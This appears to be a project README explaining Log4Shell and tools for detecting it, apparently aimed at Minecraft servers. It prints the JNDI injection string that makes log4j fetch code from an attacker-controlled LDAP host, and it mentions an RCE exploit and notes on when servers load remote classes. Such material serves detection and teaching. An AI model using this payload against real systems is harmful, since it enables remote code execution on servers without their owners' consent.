Log4Shell Zero-Day Exploit

if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java bytecode sent by Attacker Controlled LDAP Server. The bytecode could be used to execute any malicious code or do some little trolling.

take this with grain of salt, I'm not a security expert.

inb4:

https://user-images.githubusercontent.com/49940811/176066056-e96eef48-42f2-47d3-b270-477c2a19b654.mp4

Detection

Patched

• Mitigated by deleting org.apache.logging.log4j.core.lookup.JndiLookup somehow didn't crash

Unpatched

• Note: 1.16.5 Minecraft Server RCE exploit

MainDetector.java

Use simple socket to listen on port 1389 then close the socket once its connected no external dependency

• Note: not always the case, sometimes it doesn't bother to load class url location given by LDAP Server

• Vulnerable to lookup:
  

• Log:
  

going to throw error if its is vulnerable

MainAlerter.java

Use com.unboundid:unboundid-ldapsdk library to host LDAP server

• Note: doesn't mean it's vulnerable to RCE exploit.
• Vulnerable to lookup:
• LADP Server logs:

DNS Log

Both sender and receiver are logged which mean they are vulnerable

• Note: if it's get logged, doesn't mean it's vulnerable to RCE
• Vulnerable to lookup:

Conclusion

• if java do LDAP lookup doesn't mean it is always vulnerable, but if is load the classpath provided then it is ?

  • vulnerable to RCE and LDAP lookup:
  • not vulnerable because java don't fetch bytecode ??, still vulnerable to LDAP lookup:

• to test if it's actually vulnerable to RCE, try to use harmless payloads if its running then its vulnerable.

• if com.sun.jndi.ldap.object.trustURLCodebase property is set to true then you are vulnerable like really else, the attacker can use existing classpath

• if you found the victim log and see this:

  Caused by: java.lang.ClassNotFoundException: itzbenz.payload.ObjectPayloadSerializable
        at java.net.URLClassLoader.findClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
        at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)

it's safe because it will not load classpath provided by attacker ?? though it's still doing LDAP lookup which is large attack surface.

note: (after updating java 8, the minecraft server seem not load the classpath)

Disclaimer

This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.